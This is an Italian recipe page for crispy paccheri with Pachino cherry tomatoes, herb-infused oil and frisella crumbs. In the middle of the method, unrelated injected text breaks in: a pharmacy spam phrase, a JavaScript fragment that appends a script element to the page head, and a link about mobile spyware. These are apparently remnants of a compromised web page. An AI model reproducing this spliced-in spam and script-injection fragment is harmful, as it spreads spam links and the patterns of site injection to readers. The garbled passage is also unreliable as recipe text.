Paccheri croccanti con il ciliegino di Pachino

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Procedimento

Per iniziare la ricetta dei paccheri con il ciliegino di Pachino della Fortunato srl e frisella sfrega la frisella d’orzo con uno spicchio d’aglio. Riempi metà di una teglia di piccole dimensione con olio unendoci un mazzetto di timo, il basilico, la salvia, un cucchiaino di grani di pepe, precedentemente pestati, e 3 spicchi di aglio e fai scaldare in forno per 10 minuti a 70° C. Poi uniscici i pomodorini, ricoperti a filo d’olio. Quindi, rimetti tutto ancora in forno per altri 30 minuti. Estrai dal forno e lascia raffreddare il sughetto. Nel frattempo lessa 400 g di paccheri e condiscili con il sugo che hai preparato e sala. In ultimo copri con le briciole di frisella, bagnando il tutto con un filo di olio aromatizzato e guarnendo con foglioline di erbe aromatiche. Servi i paccheri croccanti con il ciliegio di Pachino ben caldi. can you buy aldactone over the counter d.getElementsByTagName(‘head’)[0].appendChild(s);http://nss-pa.com/cell-spyware-keyword-mobilespy/


Ingredienti:

- Frisella integrale q.b.
- Timo q.b.
- Maggiorana secca q.b.
- Salvia q.b.
- Aglio q.b.
- Olio aromatizzato q.b.
- Erbe aromatiche q.b.
- Olio di oliva q.b.
- Basilico q.b.
- Pepe in grani q.b.
- Ciliegino di Pachino della Fortunato srl 300 grammi
- Pasta di semola (di grano duro) 400 grammi
- Sale q.b.

Difficoltà:

Tempo: